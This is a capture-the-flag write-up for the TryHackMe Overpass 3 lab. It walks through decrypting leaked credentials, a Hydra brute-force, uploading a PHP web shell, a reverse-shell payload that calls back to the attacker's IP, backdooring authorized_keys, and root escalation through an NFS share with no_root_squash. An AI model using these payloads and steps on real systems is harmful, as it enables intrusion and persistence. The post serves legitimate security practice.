---
layout: post
title:  "THM: Overpass 3 - Hosting"
date:   2021-01-14 21:30:00 +1100
category: hacking
---

## Overpass3
*You know them, you love them, your favourite group of broke computer science students have another business venture! Show them that they probably should hire someone for security...*

This is [Overpass 3 - Hosting](https://tryhackme.com/room/overpass3hosting) from THM. It's medium rated. I add *overpass3* to /etc/hosts.

## Ports
We've got FTP, SSH and HTTP on the standard ports.

## FTP
No anonymous access, we'll move on for now.

## HTTP
I started trying [dirsearch](https://github.com/maurosoria/dirsearch) and I must say it's pretty comfy:

``
root@kali:/opt/tryhackme/overpass3# python3 /opt/dirsearch/dirsearch.py -u http://overpass3
``

It comes with it's own wordlist (although you can use any), and it finds something useful:

>[05:22:59] 301 -  233B  - /backups  ->  http://overpass3/backups/  
[05:23:00] 200 -  894B  - /backups/

From there, we get a file called *backup.zip*, which is not password protected and which contains two files:

 >12K -rw-r--r--  1 root  root  11K Nov  8 16:18 CustomerDetails.xlsx.gpg  
4.0K -rw-------  1 root  root 3.5K Nov  8 16:16 priv.key

This is PGP stuff:

{% highlight shell %}
root@kali:/opt/tryhackme/overpass3/temporary# gpg --import priv.key
gpg: key C9AE71AB3180BC08: "Paradox <paradox@overpass.thm>" not changed
gpg: key C9AE71AB3180BC08: secret key imported
gpg: Total number processed: 1
gpg:              unchanged: 1
gpg:       secret keys read: 1
gpg:  secret keys unchanged: 1
root@kali:/opt/tryhackme/overpass3/temporary# gpg --decrypt CustomerDetails.xlsx.gpg > details.xlsx
gpg: encrypted with 2048-bit RSA key, ID 9E86A1C63FB96335, created 2020-11-08
      "Paradox <paradox@overpass.thm>"
{% endhighlight %}

This gets us an Excel file containing 3 usernames and passwords.

### Hydra
Which service to use this on? We can try them both:

{% highlight shell %}
root@kali:/opt/tryhackme/overpass3# hydra -L users.txt -P pass.txt ftp://overpass3
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-14 05:31:48
[DATA] max 9 tasks per 1 server, overall 9 tasks, 9 login tries (l:3/p:3), ~1 try per task
[DATA] attacking ftp://overpass3:21/
[21][ftp] host: overpass3   login: paradox   password: REDACTED
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-01-14 05:31:53
root@kali:/opt/tryhackme/overpass3# hydra -L users.txt -P pass.txt ssh://overpass3
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-14 05:32:01
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 9 tasks per 1 server, overall 9 tasks, 9 login tries (l:3/p:3), ~1 try per task
[DATA] attacking ssh://overpass3:22/
[ERROR] target ssh://10.10.188.216:22/ does not support password authentication (method reply 36).
{% endhighlight %}

Right, so we can log in to FTP, but SSH is key based only. Goodo.

## FTP, again
We log in to FTP and we get the root of the webserver. A little testing shows we can upload to this directory, so I upload something simple in a file called *cmd.php*:

{% highlight php %}
<?php system($_GET['cmd']);?>
{% endhighlight %}

And I send it this from Burpsuite:

``
cmd=php+-r+'$sock%3dfsockopen("10.9.10.123",1234)%3bexec("/bin/sh+-i+<%263+>%263+2>%263")%3b'
``

to get a shell. 

## Apache
The host is running CentOS and we are the Apache user. We don't seem to have *which*; no matter.

{% highlight shell %}
sh-4.4$ id
id
uid=48(apache) gid=48(apache) groups=48(apache)
sh-4.4$ which python3
which python3
which: no python3 in ((null))
sh-4.4$ ls /usr/bin | grep python
ls /usr/bin | grep python
python3
python3.6
python3.6m
unversioned-python
sh-4.4$ /usr/bin/python3 -c 'import pty;pty.spawn("/bin/bash");'
/usr/bin/python3 -c 'import pty;pty.spawn("/bin/bash");'
bash-4.4$ 
{% endhighlight %}

From bash, we can **su** to *paradox* using the same password as for the FTP account. He has a *.ssh* directory in his home, and we can add our key to his *authorized_keys* file to get SSH access:

{% highlight shell %}
[paradox@localhost .ssh]$ printf 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCeyp%%AND THE REST OF MY PUBLIC KEY%%/orR1AjlnSE= root@kali\n' >> authorized_keys
{% endhighlight %}

Now we can just do:

{% highlight shell %}
root@kali:/opt/tryhackme/overpass3# ssh paradox@overpass3  
Last login: Thu Jan 14 10:40:45 2021
[paradox@localhost ~]$ 
{% endhighlight %}

## James
As *paradox* I run *linpeas*, which finds this in */etc/exports*:

>/home/james *(rw,fsid=0,sync,no_root_squash,insecure)

However thinking back we had no port 2049, so NFS is only open on the localhost. We can't mount the share on this host, because we aren't root. Hmm.

### SSH Tunnel
We can mount the share using an SSH tunnel on our local machine. First, we set up the tunnel:

``
root@kali:/opt/tryhackme/overpass3# ssh -L 3049:127.0.0.1:2049 paradox@overpass3
``

Next, we mount the share:

``
root@kali:/opt/tryhackme/overpass3# mount -t nfs -o port=3049,vers=4 127.0.0.1:/ ./mnt
``

Where *./mnt* was a local folder I'd created. Note this syntax caused me quite a few headaches; particularly the path part - NFS4 is different to NFS3 and the shared path is considered **/** when you mount it.

From there, we could get the user flag:

{% highlight shell %}
root@kali:/opt/tryhackme/overpass3/mnt# ls -lash
total 20K
   0 drwx------ 3 james kali  112 Nov 17 16:15 .
4.0K drwxr-xr-x 5 root  root 4.0K Jan 13 05:48 ..
   0 lrwxrwxrwx 1 root  root    9 Nov  8 16:45 .bash_history -> /dev/null
4.0K -rw-r--r-- 1 james kali   18 Nov  8  2019 .bash_logout
4.0K -rw-r--r-- 1 james kali  141 Nov  8  2019 .bash_profile
4.0K -rw-r--r-- 1 james kali  312 Nov  8  2019 .bashrc
   0 drwx------ 2 james kali   61 Nov  7 21:20 .ssh
4.0K -rw------- 1 james kali   38 Nov 17 16:15 user.flag
{% endhighlight %}

Note there was also a web flag belonging to Apache; it was in the home directory for the *apache* user. We can find that by looking in */etc/passwd*; it's */usr/share/httpd*. Anyway, onwards ...

## Root
Privesc was now a fairly classic NFS technique - make a copy of bash in our mounted drive and give it the SUID bit:

{% highlight shell %}
root@kali:/opt/tryhackme/overpass3/mnt# cp /bin/bash .
root@kali:/opt/tryhackme/overpass3/mnt# chmod +s bash
{% endhighlight %}

Doesn't look like much, does it? While I'm at it, I add my SSH public key to the *authorized_keys* file for *james* just like I did for *paradox*. 

Separately:

{% highlight shell %}
root@kali:/opt/tryhackme/overpass3# ssh james@overpass3
Last login: Thu Jan 14 09:15:57 2021 from 10.9.10.123
[james@localhost ~]$ pwd
/home/james
[james@localhost ~]$ ls -lash
total 1.2M
   0 drwx------. 4 james james  138 Jan 14 10:14 .
   0 drwxr-xr-x. 4 root  root    34 Nov  8 19:34 ..
1.2M -rwsr-sr-x  1 root  root  1.2M Jan 14 10:14 bash
   0 lrwxrwxrwx. 1 root  root     9 Nov  8 21:45 .bash_history -> /dev/null
4.0K -rw-r--r--. 1 james james   18 Nov  8  2019 .bash_logout
4.0K -rw-r--r--. 1 james james  141 Nov  8  2019 .bash_profile
4.0K -rw-r--r--. 1 james james  312 Nov  8  2019 .bashrc
   0 drwx------  2 james james   44 Jan 14 09:17 .gnupg
   0 drwx------. 2 james james   61 Nov  8 02:20 .ssh
4.0K -rw-------. 1 james james   38 Nov 17 21:15 user.flag
[james@localhost ~]$ ./bash -p
./bash: /lib64/libtinfo.so.6: no version information available (required by ./bash)
bash-5.1# id
uid=1000(james) gid=1000(james) euid=0(root) egid=0(root) groups=0(root),1000(james)
bash-5.1#
{% endhighlight %}

And that was that.

## Footnote
I haven't written anything for a bit; I've been trying (and failing) on EnterPrize, a new hard box on THM. I've enumerated the box, found the hidden subdomain (maintest.enterprize.thm) and poked around. It's *typo3*, and I am fairly sure the exploit is a PHP deserialization as described [here](https://www.synacktiv.com/en/publications/typo3-leak-to-remote-code-execution.html) using a leaked encryptionKey, which can be found on the box and which I have. However I have tried the exploit as described and so far I can't get it to work. Ah well, it's kept me entertained anyway.
